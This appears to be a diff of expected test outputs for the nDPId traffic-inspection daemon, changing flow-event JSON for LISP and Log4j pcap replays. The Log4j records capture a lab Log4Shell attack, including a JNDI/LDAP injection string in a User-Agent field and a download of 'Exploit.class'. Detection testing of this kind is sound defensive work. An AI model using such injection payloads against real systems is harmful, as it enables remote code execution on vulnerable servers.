+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":3790,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1597152712034} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 diff --git a/test/results/log4j-webapp-exploit.pcap.out b/test/results/log4j-webapp-exploit.pcap.out index 4705672ea..385ec1153 100644 --- a/test/results/log4j-webapp-exploit.pcap.out +++ b/test/results/log4j-webapp-exploit.pcap.out 
@@ -1,56 +1,56 @@ 00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639425815407} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815407,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815407,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815407,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815407,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAAAAQAGAkKsEO4LAAAIBgABCAAGBAACAkKsEO4LrBDuCwJCrBDuCqwQ7go="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="} 
-00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} 
